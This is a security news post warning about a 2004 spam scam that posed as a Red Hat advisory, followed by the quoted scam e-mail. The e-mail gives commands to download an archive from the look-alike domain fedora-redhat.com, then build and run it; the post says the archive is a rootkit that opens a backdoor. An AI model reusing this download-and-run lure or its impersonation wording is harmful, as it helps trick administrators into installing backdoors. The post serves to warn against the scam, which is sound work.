The Fedora – Red Hat False Vulnerability Scam

It looks like the “evil minds” have found a new way to use spam for their devious plans. This time spam is combined with a scam that will try to use social engineering for the purpose of creating server backdoors. The e-mail, pretending to be sent by Red Hat, is alerting users to promptly update their systems for the “newly found” ls and mkdir vulnerabilities. Apparently the false patch located at fedora-redhat.com is a rootkit that does the following:

  • Create a user named bash without a password
  • Grab the IP address and uptime
  • Start SSH
  • Mail the results

More information on this topic can be found over at the Slashdot discussions. K-OTik Security Research & Survey Team published the source code and the analysis of this trojan.

The copy of the e-mail:

Date: Sun, 24 Oct 2004 17:46:16 -0500
Message-Id: <200410242246.i9OMkGZs014042@2ens11.uta.edu>
To: *@net-security.org
Subject: RedHat: Buffer Overflow in “ls” and “mkdir”
Mime-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
From: RedHat Security Team
Reply-To: security@redhat.com
X-Mailer: PHP/4.3.4
X-Spam-Status: Yes, hits=8.05 tagged_above=-99 required=3.6 tests=BAYES_80, DCC_CHECK, HTML_MESSAGE, HTML_TITLE_UNTITLED, MIME_HTML_ONLY
X-Spam-Level: ********
X-Spam-Flag: YES

HTML content follows

Untitled Document

[http://www.redhat.com/g/chrome/logo_rh_home.png]

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Don't miss